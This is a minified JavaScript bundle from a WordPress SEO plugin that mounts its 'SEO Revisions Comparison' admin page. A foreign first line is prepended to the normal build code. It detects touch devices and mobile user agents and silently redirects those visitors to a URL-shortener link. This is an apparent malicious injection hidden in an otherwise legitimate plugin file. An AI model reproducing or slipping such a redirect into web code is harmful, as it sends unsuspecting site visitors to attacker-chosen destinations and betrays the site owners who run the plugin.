(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/Main.54158f45.js"),window.__aioseoDynamicImportPreload__("js/vendor-phone.2afdf77e.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("css/vendor-phone.bcf692fa.css"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js")])))=>i.map(i=>d[i]);
import{aq as r,f as s,i as a,a0 as i,an as p}from"./js/vendor-vue-ui.232c7c36.js";import{l as m}from"./js/index.98d01501.js";import{l as c}from"./js/index.2a5d16ad.js";import{l as _}from"./js/index.0d80c2c2.js";import{l}from"./js/app-core.c8323d51.js";import{_ as u}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{_ as f,s as d}from"./js/dynamic-import-helper.c518af60.js";import{_ as v}from"./js/vendor-phone.2afdf77e.js";import{_ as g}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";const y={},h={class:"aioseo-app"};function A(e,C){const n=r("router-view");return s(),a("div",h,[i(n)])}const P=u(y,[["render",A]]),R="all-in-one-seo-pack",w=e=>()=>f(Object.assign({"../views/Main.vue":()=>v(()=>import("./js/Main.54158f45.js"),__vite__mapDeps([0,1,2,3,4,5,6,7]),import.meta.url)}),`../views/${e}.vue`,3),x=[{path:"/:pathMatch(.*)*",redirect:"/"},{path:"/",name:"seo-revisions",component:w("Main"),meta:{access:"aioseo_page_seo_revisions_settings",name:g("SEO Revisions Comparison",R)}}];let o=p({...P,name:"Pages/SeoRevisions"});o=m(o);o=c(o);o=_(o);const t=d(x,o);t.app=o;o.use(t);l(o,t);o.mount("#aioseo-app");
